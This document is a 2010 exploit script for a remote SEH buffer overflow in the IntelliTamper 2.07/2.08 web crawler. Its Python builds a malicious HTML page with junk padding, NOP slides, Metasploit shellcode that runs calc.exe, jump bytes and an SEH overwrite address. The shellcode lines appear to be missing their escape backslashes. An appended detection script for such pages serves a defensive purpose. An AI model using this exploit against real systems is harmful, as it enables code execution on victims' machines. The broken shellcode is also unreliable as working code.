IntelliTamper 2.07/2.08 (SEH) Remote Buffer Overflow

Date: 2010-01-22
Author: loneferret
# IntelliTamper 2.07/2.08 (SEH) Remote Buffer Overflow
# Based on PoC: http://www.exploit-db.com/exploits/11217
# Author: loneferret
# Big thanks to: dookie
# Tested on WinXP SP3 English

# Just copy the resulting html file to a web server, and point IntelliTamper to that address.
# Should get a calculator

# Thanks to dookie for telling me to stick to it.
# Exploit-DB : Try Harder (tm)


#!/usr/bin/python
# badchar list: \x00 \x3C \x01
buffer = '<html><head><title>loneferret test</title></head><body>'
buffer += '<script defer="'

buffer += '\x41' * 6236 # junk
buffer += '\x90' * 180 # nop slide 1

# win32_exec -
# EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */

buffer += 'x2bxc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x4d'
buffer += 'x53x9exc5x83xebxfcxe2xf4xb1xbbxdaxc5x4dx53x15x80'
buffer += 'x71xd8xe2xc0x35x52x71x4ex02x4bx15x9ax6dx52x75x8c'
buffer += 'xc6x67x15xc4xa3x62x5ex5cxe1xd7x5exb1x4ax92x54xc8'
buffer += 'x4cx91x75x31x76x07xbaxc1x38xb6x15x9ax69x52x75xa3'
buffer += 'xc6x5fxd5x4ex12x4fx9fx2exc6x4fx15xc4xa6xdaxc2xe1'
buffer += 'x49x90xafx05x29xd8xdexf5xc8x93xe6xc9xc6x13x92x4e'
buffer += 'x3dx4fx33x4ex25x5bx75xccxc6xd3x2exc5x4dx53x15xad'
buffer += 'x71x0cxafx33x2dx05x17x3dxcex93xe5x95x25xa3x14xc1'
buffer += 'x12x3bx06x3bxc7x5dxc9x3axaax30xffxa9x2ex7dxfbxbd'
buffer += 'x28x53x9exc5'

buffer += '\x90' * 243 # nop slide 2

buffer += '\xE9\x55\xFE\xFF\xFF' # jumps back in nop slide 1
buffer += '\xeb\xd0\x90\x90' # small jump back in nop slide 2
buffer += '\x3b\x10\x40\x00' # 0x0040103b intellitamper.exe

buffer += '\x43' * 50

buffer += '">'
buffer += '</body></html>'  # append the closing tags (a bare "buffer + ..." discards the result)
file=open('index.html','w')
file.write(buffer)
file.close()
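
A defender-side check for the kind of file this script generates, as an added example that is not part of the original exploit or of IntelliTamper: it flags quoted HTML attribute values that are oversized, contain long single-byte runs, or carry non-printable bytes. The function names, thresholds and sample pages are assumptions constructed for illustration, and the payload region is filled with a placeholder byte.

```python
import re

TAG_OPEN = re.compile(rb'<([A-Za-z][A-Za-z0-9]*)')
ATTR = re.compile(rb'\s+([A-Za-z_:][-\w:.]*)\s*=\s*"([^"]*)"', re.DOTALL)
RUN = re.compile(rb'(.)\1+', re.DOTALL)

def longest_run(value):
    """Return (byte, length) of the longest run of one repeated byte."""
    best = (None, 0)
    for m in RUN.finditer(value):
        if m.end() - m.start() > best[1]:
            best = (m.group(1)[0], m.end() - m.start())
    return best

def scan_html(data, max_attr_len=1024, min_run=64):
    """Flag quoted attribute values that look like overflow input.
    max_attr_len and min_run are assumed thresholds; tune per site."""
    findings = []
    for tag in TAG_OPEN.finditer(data):
        pos = tag.end()
        while True:
            attr = ATTR.match(data, pos)
            if attr is None:
                break
            pos, value, reasons = attr.end(), attr.group(2), []
            if len(value) > max_attr_len:
                reasons.append('oversized')
            byte, run = longest_run(value)
            if run >= min_run:
                reasons.append('run of 0x%02x x %d' % (byte, run))
            binary = sum(1 for b in value if b < 0x20 or b > 0x7e)
            if binary:
                reasons.append('%d non-printable bytes' % binary)
            if reasons:
                findings.append({'tag': tag.group(1).decode(),
                                 'attr': attr.group(1).decode(),
                                 'length': len(value), 'reasons': reasons})
    return findings

# Constructed samples. SUSPECT mirrors the segment sizes in the script above;
# 0xCC is a placeholder for the 164-byte payload, not real shellcode.
BENIGN = b'<html><body><script defer="defer" src="app.js"></script></body></html>'
VALUE = (b'A' * 6236 + b'\x90' * 180 + b'\xcc' * 164 + b'\x90' * 243
         + b'B' * 13 + b'C' * 50)
SUSPECT = b'<html><body><script defer="' + VALUE + b'"></script></body></html>'

if __name__ == '__main__':
    for name, page in (('benign', BENIGN), ('suspect', SUSPECT)):
        print(name, scan_html(page))
```

The same function can be run over crawler fetch logs or cached responses; a legitimate `defer` attribute is either empty or the word `defer`, so any hit on that attribute deserves a look.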
